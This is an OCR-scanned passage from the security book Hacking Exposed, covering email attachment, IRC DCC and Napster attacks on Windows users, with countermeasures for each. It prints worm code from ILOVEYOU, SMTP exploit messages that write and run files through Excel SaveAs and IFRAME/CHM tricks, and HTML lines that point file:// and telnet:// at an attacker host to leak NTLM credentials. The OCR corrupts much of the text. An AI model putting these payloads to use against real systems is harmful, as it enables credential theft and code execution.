"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a . AddressEntries . Count 
else 

regedit . RegWrite 

"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a . AddressEntries . Count 

end if 

next 

Set out=Nothing 
Set mapi=Nothing 
end sub 

This simple 37-line routine invokes the Messaging Application Programming Inter- 
face (MAPI) to scour the Windows Address Book (WAB) in the Registry, and creates a 
mail item with the subject "ILOVEYOU" and message body "kindly check the attached 
LOVELETTER coming from me" for each recipient it finds there. (Thanks to Brian Lewis 
of Eoundstone, Inc., for help with the code analysis.) In case any nonprogrammers out 
there think this is rocket science, let us remind you that ILOVEYOU was based on an aca- 
demic thesis paper written by a 23-year-old college student. Who knows how much dam- 
age could have been done? 

O Stopping Address Book Worms 

After years of abuse in fhe media, Microsoft tired of pointing out that users were ulti- 
mately to blame for launching email aftachmenfs confaining such worms and released a 
pafch. The pafch was called the Outlook 2000 SR-1 E-mail Security Update (see http: / / office 
.microsoft.eom/downloads/2000/0uf2ksec.aspx). One feature of fhis fhree-pronged fix 
was the Object Model Guard, which was designed to prompt users whenever an external 
program attempted to access their Outlook Address Book or send email on the user's behalf. 

Reliable Soffware Technologies Corporafion (RSTCorp, now Cigital, htfp: / / 
www.cigifal.com) released an add-on utility that stops certain calls to Outlook by moni- 
toring the Virtual Basic Scripting Engine, thereby stopping the spread of viruses like 
ILOVEYOU. The patch, called JustBeEriends.dll (JBE), can be used in conjimction with 
Microsoft's update for Ouflook. In confrast fo Microsoff's Objeef Model Guard, which 
works by controlling access to functions within Outlook that can be used to gather email 
addresses or send emails, JBE "works by controlling the ability of ofher applications to 
access Outlook or Outlook Express. In the event that the access comes from a scripf being 
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run from the desktop or from an attachment, the access is denied. Otherwise, the user is 
asked to confirm that the application should be allowed access to Outlook" (from the 
Technical Details on JBF at http:/ / www.cigital.com/jbf/ tech.html). 

Cigital claims that their approach is superior, since Microsoft's Object Model Guard 
must protect an exhaustive list of objects if it is to be successful, a challenging task. They 
also note that email addresses may still be exposed if they appear in signatures, message 
bodies, or other documents, and that "future methods for exploiting flaws in Outlook to 
send e-mails are likely to be found." By gating script-based access to Outlook/OE, JBF 
theoretically can prevent new attacks based on a wide range of related attack techniques. 

The JustBeFriends DLL can be found at http:/ / www.cigital.com/jbf/. We recom- 
mend it for Outlook / OE users on NT / 2000 platforms. 




JustBeFriends does not work on Win 9x piatforms. 



File Attachment Attacks 



One of the most convenient features of email is the ability to attach files to messages. This 
great timesaver has obvious drawbacks, however — namely, the propensity of users to ex- 
ecute just about any file they receive via email. No one seems to recall that this is equiva- 
lent to inviting the bad guys right into your living room. 

Next we will discuss many attacks that leverage files attached to email messages. 
Many revolve around mechanisms for disguising the nature of the attached file or mak- 
ing it irresistibly attractive to the victim's mouse-clicking finger. Other attacks we discuss 
are much more insidious, actually writing attached files to disk without any user inter- 
vention or knowledge. Most Internet users know to handle email attachments extremely 
carefully and with great skepticism — we hope the following section strongly reinforces 
this concept. 



• 'Scrap 



File Attachment Attacks 



Popularity: 


5 


Simplicity: 


5 


Impact: 


10 


Risk Rating: 


7 



A little-known secret of Windows is that files with the extension .shs have their real file 
extension hidden by default according to the Registry setting FlKEY_CLASSES_ROOT\ 
SheUScrapXNeverShowExt. This probably wouldn't be that big a deal, except that .SITS 
files, also known as scrap files or Shell Scrap Objects, can execute commands. Based on Ob- 
ject Linking and Embedding (OLE) technology discussed in the previous section on 
ActiveX, scrap files are essentially a wrapper for another embedded object. Objects can be 
Excel spreadsheets (which most people have seen embedded in Word documents) or even 




Hacking Exposed: Network Security Secrets and Solutions 



678 



other files. The easiest way to create one is to embed a file into another OLE-compliant ap- 
plication (try Wordpad) and then to copy its icon to another folder. The file is now con- 
tained in its very own wrapper file, with its own special icon and a imique extension (.shs). 
When the .SHS file is launched, the embedded object is also executed. What's more, com- 
mands can be associated with the embedded object using Microsoft's Object Packager, 
opening up the entire realm of malicious activities to anyone halfway familiar with DOS. 

In June 2000, someone laimched a worm called LifeChanges that leveraged these fea- 
tures of scrap files to attack users. The worm was vectored by email with a varying sub- 
ject line referring to jokes contained in the attached file. The file attachment was a scrap 
file with a fraudulent .txt extension, making it seem like a common text file. (The default 
scrap file icon even looks like a text file.) Once executed, LifeChanges performed the stan- 
dard routines: mailed itself to the first 50 recipients of the victim's address book, deleted 
files, and so on. It was startling to see someone base an attack so clearly on the malicious 
features of scrap files that had been known for years, and most entertainingly chronicled 
on the PCHelp web site at http:/ /www.pc-help.org/security/scrap.htm. Who knows 
how many other land mines like this one lie in wait in the Windows Registry? 

O Scrap File Countermeasures 

Some excellent advice for blunting the most dangerous aspects of scrap files is available 
on PCHelp, including the following: 



T Delete the NeverShowExt Registry value referenced earlier and from under 
HKLM \SOETWARE\Classes\DocShortcut, thus making .shs and .shb 
extensions visible in Windows. (.SHB files perform similarly to .SHS.) 

■ Update antivirus scarmers to look at .SHS and .SHB files in addition to other 
executable file t 5 q)es. 

■ Disable scrap files entirely by either removing them from the list of known 
Windows file types or by deleting the shscrap.dll file in your System folder. 

A Don't use the Windows Explorer — use the old Eile Manager (winfile.exe on NT 4) . 



# liiding 



Mail Attachment Extensions by Padding with Spaces 



Popularity: 


7 


Simplicity: 


8 


Impact: 


9 


Risk Rating: 


8 



In a post to the Incidents mailing list on May 18, 2000 (see http: / / www.securityfocus.com / 
archive/ 75 / 60687), Volker Werth reported a method for sending mail attachments that clev- 
erly disguised the name of the attached file. By padding the filename with spaces (%20 in 
hex), mail readers can be forced to display only the first few characters of the attachment 
name in the user interface. Eor example: 



f reemp3 . doc 



. . [150 spaces] . . 



. exe 
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This attachment appears as freemp3.doc in the UI, a perfectly legitimate-looking file fhaf 
mighf be saved fo disk or launched righf from fhe email. Here's a screen shof of whaf fhis 
looks like in Ouflook Express: 




Q Hidden File Attachment Countermeasure 



As you can see by fhe icon in fhe preceding illusfrafion, fhe file affachmenf is plainly nof a 
Word documenf. The fellfale frailing ellipsis (...) also helps give fhis away. If fhese signs 
aren'f enough, you shouldn'f be opening aftachmenfs direcfly from email messages an 5 nvay! 
The Ouflook SR-1 Securify pafch can help wifh fhis. If forces you fo save mosf harmful file af- 
fachmenf fypes fo disk (seehftp:/ / office.microsoft.com/ downloads/ 2000 /Ouf2ksec.aspx). 



9 ' Social Techniques for Cajoling Attachment Download 



Popularity: 


10 


Simplicity: 


10 


Impact: 


10 


Risk Rating: 


10 



The direct approach to writing a mail attachment to disk is social engineering. Ever 
see this text appear in the body of an email? 

"This message uses a characfer sef fhaf is nof supporfed by fhe Infernef Service. 

To view fhe original message confenf, open fhe affached message. If fhe fexf 
doesn'f display correcfly, save fhe affachmenf fo disk, and fhen open if using 
a viewer fhaf can display fhe original characfer sef." 







680 



Hacking Exposed: Network Security Secrets and Solutions 



This is a standard message created when mail messages (in .EML format) are for- 
warded fo Ouflook users and some error occurs wifh fhe MIME handling of fhe en- 
closed/forwarded message. If sfrikes us fhaf fhis is an almosf irresisfible fechnique for 
geffing someone fo launch an affachmenf (eifher direcfly or affer saving fo disk). We've 
acfually received such messages senf from fhe lisfservers of very prominenf securify 
mailing lisfs! Of course, fhis is one of an unlimifed range of possibilities fhaf attackers 
could inserf info fhe body or subjecf field of a message. Don'f be fooled! 

Q File Attachment Trickery Countermeasure 

Your mouse-clicking finger is fhe only enemy here — feach if fo behave, and scan down- 
loaded affachmenfs wifh virus-scarming software before launching fhem. Even fhen, fake 
a serious look af fhe sender of fhe email before making fhe decision fo launch, and be 
aware fhaf mail worms like ILOVEYOU can masquerade as your mosf frusfed friends. 



Writing Attachments to Disk Without User Intervention 

To fhis poinf, we've falked abouf several mechanisms for executing files fhaf mighf lie on a 
remofe user's disk, and fhe attacks lisfed so far have generally relied on existing execufables 
fo perform fheir dirfy work (eifher on fhe remofe server or on a local user's disk). However, 
whaf if an attacker also had fhe abilify fo wrife files fo fhe vicfim's disk? This would provide a 
complefe mefhodology for delivering a payload and fhen defonafing if. 



9 ' iHijacking Excel/PowerPoint’ 



s SaveAs Function 



Popularity: 


5 


Simplicity: 


5 


Impact: 


8 


Risk Rating: 


6 



The magic behind fhis affack comes from Georgi Guninski's observafion fhaf 
MS Excel and PowerPoinf have a SaveAs function (see hffp: / / www.guninski.com/ 
sheefex-desc.hfml). Thus, once an Office documenf is called wifhin IE using fhe objecf fag 
(as we have seen before), if exposes fhe abilify fo save dafa fo any arbifrary location on 
disk. Georgi's exploif exfracfs fhe dafa fo be saved direcfly from a file called Bookl.xla, 
which is a simple Excel file renamed fo .xla. Georgi uses fhe .xla exfension so fhaf fhe file 
is execufed by Windows af hoof time if placed in fhe Sfarfup folder. 

A slighfly modified version of Georgi's complefe exploif encapsulafed in our mail 
hacking formal is shown nexf: 

helo somedomain.com 

mail from: <mallory0attack . net> 

rcpt to: <hapless0victim.net> 

data 
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subject: Check this out! 

Importance : high 
MIME -Version : 1.0 

Content-Type: text/html; charset=us-ascii 
<HTML> 

<h2>Enticing message here!</h2> 

<object data="http : //www . guninski . com/Bookl . xla" id="shl" width=0 height=0> 
</ob ject> 

<SCRIPT> 
function f ( ) 

{ 

fn=" D : \\test\\georgi-xla . hta" ; 

shl . object . SaveAs (fn, 6) ; 

alert (fn+" successfully written"); 

} 

set Timeout ( "f ( ) ", 5000) ; 

</SCRIPT> 

</HTML> 



quit 

Georgi's code is contained between the <object> and </SCRIPT> tags. We have modified 
it to access his Bookl.xla file using its full URL. (His original exploit had the file available 
directly on the web server.) The content of Bookl.xla is written to the file specified in the 
"fn=" line. We also removed some commented lines from Georgi's original code that 
showed how you could save the file to the Windows Startup folder. (We think you get the 
point.) Previewing this message in OE on NT 4 with the security zone set at Low first 
pops up a brief file transfer window, then the following message: 




We're lazy and used Georgi's pre-built Bookl.xla file as raw material here. It is harm- 
less (containing only a couple of lines of code that execute "Hello world" in a DOS shell 
window). However, with the growth of free and anonymous file repository services on 
the Internet, it would be simple for malicious attackers to create their own malicious Of- 
fice document and make it available for download. Misconfigured or compromised web 
or FTP servers would also make for a ripe depot for such files. 
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Q Countermeasure for Excel/PowerPoint File Writing Attacks 

Need we say it again? Obtain the relevant patches from http: / / www.microsoft.com / 
technet/security/bulletin/MS00-049.asp. This patch marks Excel and PowerPoint docs 
as "unsafe for scripfing" (no snickering, please). Of course, you could slop puffing Band- 
Aids all over your compufer and sfaunch fhe bleeding entirely by disabling AcfiveX in 
fhe appropriafe marmer, as described in fhe discussion on securify zones earlier. 



Vorce Feeding Attachments 



Popularity: 


5 


Simplicity: 


2 


Impact: 


8 


Risk Rating: 


5 



The people af hffp:/ /www.malware.com suggesfed fhe phrase "force feeding" fo de- 
scribe fhe mechanism fhey proposed for downloading a file fo a user's disk wifhouf his or 
her permission. The essence of malware.com's exploif is fheir claim fhaf Ouflook/OE ig- 
nores user inpuf when asked fo dispafch a file affachmenf fo an email message. Normally, 
when an email affachmenf is launched from wifhin fhe mail reader, Ouflook/ OE prompfs 
fhe user fo Open, Save To Disk, or Cancel fhe action. Malware.com claimed fhaf no maffer 
whaf fhe user selecfed, fhe affachmenf was written fo fhe Windows %femp% directory 
(C:\Windows\femp on Win 9x and C:\femp on NT). Win 2000's femp folders are per-user 
and are harder fo pin down wifh regularify if if is cleanly rnsfalled and nof upgraded. Once 
deposifed, fhe file was launched using a clever frick: fhe HTTP mefa-refresh fag, which is 
used fo redirecf fhe browser silenfly and automatically fo a page confained wifhin fhe fag. 
Por example: 

<META HTTP-EQUIV=" re fresh" content="2 ; URL=http : / /www . other site . com" > 

This code embedded in a web page will bounce viewers fo www.ofhersife.com. The "con- 
fenf=" S 5 mfax fells fhe browser how long fo waif before redirecfing. Malware.com simply 
poinfed fhe mefa-refresh af one of fhe local files if deposifed via force feeding: 

<meta http-equiv="ref resh" content="5; 
url=mhtml : file : //C : \WINDOWS\TEMP\lunar .mhtml"> 

The lunar .mhfml file, force-fed as an affachmenf fo fhe original message, confained a link 
fo a "safe for scripfing" AcfiveX confrol fhaf launched a second affachmenf, an execufable 
called mars.exe. Roundabouf, buf effective. 

In fhe Bugfraq fhread covering fhis finding, af leasf fwo quite repufable securify au- 
fhorifies disagreed on whefher fhis phenomenon acfually worked as adverfised. Tesfing 
by fhe aufhors of fhis book produced errafic resulfs, buf supporfed fhe idea fhaf fhe 
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appropriate IE security zone (see earlier) used for mail reading in Outlook/OE had to be 
set to Low for fhis fo occur, and if only occurred sporadically af fhaf. We were successful 
af forcing an affachmenf fo fhe femp direcfory on Win 98 SE and NT 4 Worksfafion sys- 
fems wifh zone securify af Low on two occasions, buf could nof repeal fhis consisfenfly. 
The mysfery of force feeding a la malware.com remains unsolved. 

This is a bif comforfing. Think of fhe frouble fhis could cause in conjuncfion wifh 
Georgi Giminski's exploif for execufing code wifhin MS Office documenfs. Attackers 
could send fhe Office documenf confaining malicious code as an affachmenf, and fhen 
send a second message wifh fhe appropriafe ActiveX fag embedded wifhin fhe body of 
fhe message fhaf poinfed fo fhe %femp% folder where fhe affachmenf gefs force-fed, like 
if or nof. (Georgi acfually pulls fhis off — wifhin fhe same message. See fhe nexf attack.) 

Of course, as we've mentioned, fhe easy availabilify of free and anonymous file repos- 
ifory services on fhe Infemef makes fhe downloading of code fo local disk unnecessary. 
By pointing malicious email messages af exploif code available on one of fhese services, 
an attacker guaranfees fhe availabilify of fhe second parf of such an attack, and if is a vir- 
fually unfraceable perch af fhaf. 



llsing IFRAME to Write Attachments to TEMP 



Popularity: 


5 


Simplicity: 


9 


Impact: 


10 


Risk Rating: 


8 



Georgi demonsfrafes his keen eye for seemingly small problems wifh broad implications 
in this, his #9 advisory of 2000 (see hffp:/ /www.giminski.com/eml-desc.hfml). The key is- 
sue here is Ouflook/OE's propensify fo creafe files in fhe TEMP direcfory wifh a known 
name and arbifrary confenf, much like fhe mechanism proposed by malware.com. However, 
by leveraging ofher exploif s he has developed, including fhe Windows Help Eile shortcuf ex- 
ecution vulnerabilify (.GHM files, see hffp:/ /www.guninski.com/chm-desc.hfml) and fhe 
ever-useful lERAME fag (see earlier sections discussing lEAME), Georgi seems fo have un- 
covered a consisfenf mechanism for delivering fhe goods — and a way fo execufe fhe down- 
loaded code. Thus, we have given fhis exploif a Risk Rating of 8, among fhe highesf of fhe 
ones we've discussed so far, because if comes fhe closesf fo being fhe fofal package: ivrite a file 
to disk, and then execute it without any user input. 

The frick is fhe use of fhe lERAME fag wifhin fhe body of an email message fhaf refer- 
ences an affachmenf fo fhe same message. Eor some peculiar reason fhaf perhaps only 
Georgi knows, when fhe lERAME "touches" fhe attached file, fhe file is flushed fo disk. If is 
fhen easy fo call fhe file from a scripf embedded in fhe body of fhe very same message. The 
file Georgi writes is a GHM file, which he has graciously configured fo call Wordpad.exe 
using an embedded "shorfcuf" command. 
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Here is a mail hacking capsule demonstrating the attack. Note that the CHM file has 
to be prepacked using mpack. (See the earlier section "Mail Hacking 101.") 

helo somedomain.com 

mail from: <mallory0attacker . net> 

rcpt to: <hapless0victim.net> 

data 

subject: This one takes the cake! 

Importance : high 
MIME -Version: 1.0 
Content-Type: multipart/mixed; 

boundary="_boundaryl_" 



— _boundary 1_ 

Content-Type : multipart/alternative; 

boundary= "_boundary2_" 



— _boundary2_ 

Content-Type: text/html; charset=us-ascii 

<IFRAME align=3Dbaseline alt=3D"" = 
border=3D0 hspace=3D0=20 
src=3D"cid: 5551212 "></IFRAME> 

<SCRIPT> 

setTimeout ( 'window. showHelp ( "c : /windows/temp/abcde . chm" ) ; ' , 1000) ; 
setTimeout ( 'window. showHelp ( "c : /temp/abcde . chm" ) ; ' , 1000) ; 

setTimeout ( 'window. showHelp ( "C : /docume~l/admini~l/locals~l/temp/abcde . chm" ) ; 

', 1000 ) ; 

</SCRTPT> 



— _boundary2_ — 



— _boundary 1_ 

Content-Type : application/binary; 

name="abcde . chm" 

Content-ID: <5551212> 

Content-Transfer-Encoding : base64 

[Base64-encode abode. chm using mpack and embed here] 



— _boundaryl_ — 



quit 
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In the authors' testing of this attack against Windows 9x, NT, and 2000, and Outlook and 
Outlook Express, this exploit was triggered flawlessly, mosf offen when simply pre- 
viewed. (The lines beginning wifh "sefTimeouf" acfually specify fhe oufcome on fhe 
fhree differenf OSes — can you fell which is for which?) 

The key ifem in fhis code lisfing is fhe Confenf-ID field, populafed wifh fhe nonce 
5551212 in our example. The src of fhe IFRAME in fhe body of fhe email refers fo fhe ID of 
fhe MIME affachmenf of fhe same message, creating a nice circular reference fhaf allows 
fhe affachmenf fo be wriffen fo disk and called by fhe same malicious email message. 

Q Countermeasure to IFRAME Attachment Stuffing 

The only defense againsf fhis one is conscienfious use of AcfiveX, as explained in fhe sec- 
tion on securify zones earlier. Microsoft has nof released a pafch. 



Invoking Outbound Client Connections 

We've falked a lof abouf performing acfions on fhe clienf sysfem fo fhis poinf, buf only 
briefly have we touched on fhe concepf of letting fhe clienf software initiate malicious ac- 
tivity on behalf of a remote attacker. Once again, if's easy fo see how Infemef technologies 
make such attacks easy fo implemenf — consider fhe Uniform Resource Locator (URL) fhaf 
we are all accustomed fo using fo navigafe fo various Infemef sites. As ifs name suggesfs, a 
URL can serve as much more fhan a marker for a remote web site, as we illusfrafe nexf. 

^^^edirecting SMB Authentication 



Popularity: 


4 


Simplicity: 


9 


Impact: 


7 


Risk Rating: 


7 




This basic buf exfraordinarily devious frick was suggested in one of fhe early releases 
of LOphfcrack (see Chapfer 5). Send an e-mail message fo fhe vicfim wifh an embedded 
hyperlink fo a fraudulenf Windows file sharing service (SMB) server. The vicfim receives 
fhe message, fhe h 5 ^erlink is followed (manually or aufomafically), and fhe clienf unwif- 
fingly sends fhe user's SMB credenfials over fhe network. Such links are easily disguised 
and t 5 ^ically require little user interaction because Windoivs automatically tries to log in as 
the current user if no other authentication information is explicitly supplied. This is probably 
one of fhe mosf debilifafing behaviors of Windows from a securify perspective. 

As an example, consider an embedded image fag fhaf renders wifh HTML in a web 
page or email message: 



<html> 

<img src=f He :// attacker_server/null . gif height=l width=l></ img> 
</html> 
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When this HTML renders in IE or Outlook/ Outlook Express, the null.gif file is 
loaded, and the victim will initiate an SMB session with attacker _server. The shared re- 
source does not even have to exist. 

Once the victim is fooled info cormecfrng fo fhe affacker's sysfem, fhe only remaining 
feafure necessary fo complefe fhe exploif is fo capfure fhe ensuing LM response, and we've 
seen how frivial fhis is using SMBCapfure in Chapfer 5. Assuming fhaf SMBCapfure is lis- 
fening on attacker _server or ifs local network segmenf, fhe NTLM challenge-response fraffic 
will come pouring in. 

One variafion on fhis affack is fo sef up a rogue SMB server fo capfure fhe hashes, as 
opposed fo a sniffer like SMBCapfure. In Chapfer 6, we discussed rogue SMB servers 
like SMBRelay fhaf can capfure hashes or even log on to the victim's machine using the 
hijacked credentials. 

SMB Redirection Countermeasures 

The risk presenfed by SMB redirecfion affacks can be mifigafed in several ways. 

One is fo ensure fhaf network security best practices are followed. Keep SMB services 
within protected networks: severely restrict outbound SMB traffic at border firewalls, 
and ensure that the overall network infrastructure does not allow SMB traffic to pass by 
untrusted nodes. A corollary of this remedy is to ensure that physical network access 
points (wall jacks, and so on) are not available to casual passers-by. (Remember that this 
is made more difficult with the growing prevalence of wireless networking.) In addition, 
although it's generally a good idea to use features built-in to networking equipment or 
DHCP to prevent intruders from registering physical and network-layer addresses with- 
out authentication, recognize that sniffing attacks do not require the attacker to obtain a 
MAC or IP address. They operate in promiscuous mode. 

Second, configure all Windows systems within your environment to disable propaga- 
tion of the LM and NTLM hashes on the wire. This is done using the LAN Manager Au- 
thentication Level setting. (See Chapters 5 and 6.) 

The best defense for this attack is to Require SMB Packet Signing on your machine. Any 
sessions that are hijacked in the preceding manner won't be able to cormect back to your 
box with this setting enabled. (It's in Group Policy Security Settings under Windows 2000.) 

/ 

iHarvesting NTLM Credentials Using Telnet:// 



Popularity: 


4 


Simplicity: 


9 


Impact: 


7 


Risk Rating: 


7 



As if the file:/ / URL weren't bad enough, Microsoft Internet client software automati- 
cally parses telnet:/ /server URLs and opens a cormection to server. This also allows an at- 
tacker to craft an HTML email message that forces an outbound authentication over any port: 

<html> 

<frameset rows=" 1 00%, * " > 
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<frame src=about : blank> 

< frame src=telnet : / / evil . ip . address :port> 

</ f rameset> 

</html> 

Normally, this wouldn't be such a big deal, except that on Win 2000, the built-in telnet 
client is set to use NTLM authentication by default. Thus, in response to the preceding 
HTML, a Win 2000 system will merrily attempt to log on to evil.ip. address using the stan- 
dard NTLM challenge-response mechanism. This mechanism, as we saw in Chapter 5, 
can be vulnerable to eavesdropping and man-in-the-middle (MITM) attacks that reveal 
the victim's username and password. 

This attack affects a multitude of HTML parsers and does nof rely on any form of Ac- 
five Scripfing, JavaScripf or otherwise. Thus, no IE configuration can prevent this behav- 
ior. Credit goes to DilDog of Back Orifice fame, who posted this exploit to Bugtraq. 

O Countermeasures for Telnet:// Attacks 

Network security best practices dictate that outbound NTLM authentication traffic be 
blocked af fhe perimeter firewall. However, this attack causes NTLM credentials to be 
sent over the telnet protocol. Make sure to block outbound telnet at the perimeter gate- 
way as well. 

At the host level, configure Win 2000's felnef clienf so fhaf if doesn'f use NTLM au- 
fhenfication. To do fhis, run felnef af fhe command prompf, enfer unset ntlm, and then 
exit telnet to save your preferences info the Registry. Microsoft has also provided a patch 
in MSOO-067 that presents a warning message to the user before automatically sending 
NTLM credentials to a server residing in an untrusted zone. (MSOO-067 can be found af 
hffp:/ / WWW. microsoft.com/ technet/ treeview/default.asp?url=/technet /security/ 
bulletin/MS00-067.asp.) This has also been fixed in Window 2000 SP2. This vulnerability 
is cataloged as Bugtraq ID 1683 (http:/ /www.securityfocus.com/bid/1683). 

It's also pertinent to mention here that the LAN Manager Authentication Level setting in 
Security Policy can make it much more difficult to extract user credentials from NTLM chal- 
lenge-response exchanges, as discussed in Chapfer 5. Setting it to Send NTLMv2 Response 
Only or higher can greatly mitigate the risk from LM/NTLM eavesdropping attacks. (This 
assumes the continued restricted availability of programs fhaf will exfract hashes from 
NTLMv2 challenge-response fraffic.) Rogue server and man-in-fhe-middle (MITM) attacks 
againsf NTLMv2 authentication are still feasible, assuming fhaf the rogue /MITM server can 
negotiate the NTMv2 dialect with the server on behalf of fhe clienf. 



IRC HACKING 

Infemef Relay Chaf (IRC) remains one of the more popular applications on the Internet, 
driven not only by the instant gratification of real-time communications, but also by the 
ability to instantaneously exchange files using mosf modem IRC clienf software. (Our fa- 
vorite is mIRC; see Chapter 14.) This is where the trouble starts. 
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IRC newbies are often confused by the frequent offers of files from participants in a 
channel. Many are sensible enough to decline offers from complete strangers, but the 
very nature of IRC tends to melt this formality quickly. One of the authors' relatives was 
suckered by just such a ploy, a simple batch file that formatted his hard drive. (His name 
won't be provided to protect the irmocent — and the reputation of the author whose own 
flesh and blood should've known better!) Like irmocuous mail attachments, however, the 
problem is often more insidious, as we shall see next. 

l3CCed File Attacks 



Popularity: 


9 


Simplicity: 


9 


Impact: 


10 


Risk Rating: 


9 



An interesting thread on such attacks appeared on the Incidents mailing list operated 
by Security Focus (http://www.securityfocus.com; look for the INCIDENTS Digest - 10 
Jul 2000 to 11 Jul 2000, #2000-131). A curious user had been offered a file via DCC. (On 
IRC, a method called DCC Send and DCC Get is used to connect directly to another IRC 
client to Send and Get files, instead of going through the IRG network.) The file was 
named LIFE_STAGES.TXT. (Now where have we seen that before? Hint: Look back to the 
section on Windows "Scrap File Attachment Attacks" earlier.) Plainly, this was either a 
blatant attempt to cause damage to the user's system, or an automated attack sent by a 
compromised IRC client without its user's knowledge. 

This is one of the features of IRC that disarms new users quickly. IRC clients that have 
been compromised by a worm can embed themselves into the client's automated script 
routines, automatically DCCing themselves to anyone who joins a charmel, without the 
user at the terminal even knowing. 

Furthermore, the worm discussed in the Incidents thread was likely tailored to set 
autoignore for known antivirus proponents when it joins certain charmels. Such worms 
also autoignore people who write to the client about "infected," "life-stages," "remove," 
"virus," and many other trigger words. It can thus take time before the infected user can 
be warned of the problem without triggering the autoignore function. 

O DCC Countermeasures 

Fortunately, the default behavior of most IRC clients is to download DCCed files to a 
user-specified download directory. The user must then navigate to this directory and 
manually launch the file. 

Like email attachments, DCCed files should be regarded with extreme skepticism. Be- 
sides the usual culprits (.BAT, .COM, .EXE, .VBS, and .DLL hies), watch out for Microsoft Of- 
fice documents that may contain harmful macros, as well as IRC client automation Aliases, 
Popups, or Scripts that can take control of your client. Use of antivirus scanners for such hies 
is highly recommended. 
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Attempting to trace malicious users on IRC is t 5 ^ically a waste of time. As pointed out 
in the Incidents thread, most attackers cormect to IRC using virtual hosts (vhost) via BNC 
(IRC Bouncer, basically an IRC proxy server). Thus, backtracing to a given IP may reveal 
not the user sitting behind a terminal, but rather the server rurming the BNC. 



NAPSTER HACKING WITH WRAPSTER 




Although we really don’t consider Napster and Wrapster a huge security threat, we thought both prod- 
ucts demonstrate the simple ethos of hacking on a grand scale and just had to talk about them In our 
book. We look forward to the day when Napster Is reincarnated and the world can enjoy truly conve- 
nient access to their favorite music, and artists can enjoy an unencumbered delivery channel. 



Another example of the great potential for security conflagration brought about by 
the combination of power and popularity is the revolutionary distributed file-sharing 
network called Napster (http:/ /www .napster.com). Napster is a variation on a typical 
client-server file-sharing tool in which the server acts as a centralized index of MP3 audio 
files that exist on the hard drives of all the users connected to the network with the 
Napster client. Users search the index for an MP3 that they wish to download, and the 
server cormects their client directly to the user(s) who actually possesses the file(s) that 
matches the query. Thus, all users who wish to participate in the bountiful goodness that 
is Napster must share out some portion of their hard drive and give read/ write permis- 
sion to others. 

Napster attempts to keep non-MP3 files off the network to avoid potential spread of 
malware via the system. It does this by checking the binary headers of files copied over 
the network and verifying that they resemble the MP3 header format. Versions of 
Napster subsequent to beta 6 employ a new MP3 detection algorithm, one that checks for 
actual frames inside a file in addition to verifying the MP3 header. 

Of course, the same human ingenuity that brought us Napster conceived of a way to 
smuggle non-MP3s over the network in short order. Wrapster, by Octavian (search for it 
at http:/ /download. cnet.com), hides file types, disguising them as legitimate MP3 files 
that are "encoded" at a specific bit rate (32 Kbps), allowing it to be traded via the Napster 
network just like any other MP3. Users who want to see what's Wrapster-ized out there 
can simply search the Napster network for the bit rate defined earlier, and any available 
Wrapster files will pop up. Or, if you know what files your friend is sharing out, you can 
simply search by name and bit rate. We now have a distributed network where wildly 
popular music files trade hands like money and also have a mechanism for creating Tro- 
jans that resemble the music file format. Anyone see a reason to be cautious here? 

Fortunately, Wrapster requires users to first manually extract the faux MP3 file using a 
helper application before it can be executed. Simply double-clicking on a Wrapster- 
encoded file wiU attempt to open it in the user's digital music player of choice, at which 
point it will be recognized as an illegitimate MP3 and fail to load. This shifts the burden 
from the technology to the user to correctly identify whether the enclosed file is dangerous. 
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Once again, human judgment provides the only barrier between a great thing (free music) 
and a formatted hard disk. 

So, if Napster is not a security concern today, it certainly illustrates how applications 
and people make assumptions, and how it may be possible to b 5 ^ass assumptions. We 
hope our discussion has encouraged further analysis of such assumptions and further 
use of Napsfer. 



CAIJTIOiV 



Various open-source clones of the Napster software package reportedly have a vulnerability by which an 
attacker could view files on a machine running a vulnerable Napster clone client. (The official commercial 
version of Napster does not contain this vulnerability.) See http://www.securityfocus.eom/bid/1 186/. 



GLOBAL COUNTERMEASURES TO INTERNET 
USER HACKING 

We've discussed a lot of nasty techniques in this section on Internet user hacking, many 
of which confer around fricking users info running a virus, worm, or other malicious 
code. We have also talked about many point solutions to such problems, but until now 
have avoided discussions of broad-spectrum defense againsf such attacks. 

O Keep Antivirus Signatures Updated 

Of course, such a defense exists and has been around for many years. It's called antivirus 
software, and if you're not running it on your system, you're taking a big risk. Dozens of 
vendors offer antivirus software. Microsoft publishes a good list at http:/ /support 
.microsoft.eom/support/kb/articles/Q49/5/00.ASP. Most of the major brand names 
(such as Symantec's Norton Antivirus, McAfee, Data Fellows, Trend Micro, and Com- 
puter Associates' Inoculan/InoculatelT) do a similar job of keeping malicious code at bay. 

The one major drawback to the method employed by antivirus software is that it does 
not provide protection against new viruses that the software has not been taught how to 
recognize yet. Antivirus vendors rely on update mechanisms to periodically download 
new virus definitions to customers. Thus, there is a window of vulnerability between the 
first release of a new virus and the time a user updates virus definitions. 

As long as you're aware of that window and you set your virus software to update it- 
self automatically at regular intervals (weekly should do it), antivirus tools provide an- 
other strong layer of defense against much of what we've described earlier. Remember to 
enable the auto-protect features of your software to achieve full benefit, especially auto- 
matic email and floppy disk scarming. And keep the virus definitions up to date! Most 
vendors offer one free year of automatic virus updates, but then require renewal of auto- 
mated subscriptions for a small fee thereafter. For example, Symantec charges around $4 
for an armual renewal of its automatic LiveUpdate service. For those permy-pinchers in 
the audience, you can manually download virus updates from Symantec's web site for 
free at http:/ / www.symantec.com/avcenter/download.html. 
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Also, be aware of virus hoaxes that can cause just as much damage as the viruses 
themselves. See http:/ /vmyths.com/hoax.cfm?page=0 for a list of known virus hoaxes. 

O Guarding the Gateways 

The most efficient way to protect large numbers of users remains a tough network-layer 
defense strategy. Of course, firewalls should be leveraged to the hilt in combating many 
of the problems discussed in this chapter. In particular, pay attention to outbound access 
control lists, which can provide critical stopping power to malicious code that seeks to 
connect to rogue servers outside the castle walls. 

In addition, many products are available that will scan incoming email or web traf- 
fic for malicious mobile code. One example is Finjan's SurfinGate technology (http: / / 
www.finjan.com), which sits on the network border (as a plug-in to existing firewalls or 
as a proxy) and scans all incoming Java, ActiveX, JavaScript, executable files. Visual Basic 
Script, plug-ins, and cookies. SurfinGate next builds a behavior profile based on the ac- 
tions that each code module requests. The module is then uniquely identified using an 
MD5 hash so repetitive that downloads of the same module only need to be scanned 
once. SurfinGate compares the behavior profile to a security policy designed by the net- 
work administrator. SurfinGate then makes an "allow" or "block" decision based on the 
intersection of the profile and policy. Finjan also offers a personal version of SurfinGate 
called SurfinGuard, which provides a sandbox-like environment in which to run down- 
loaded code. 

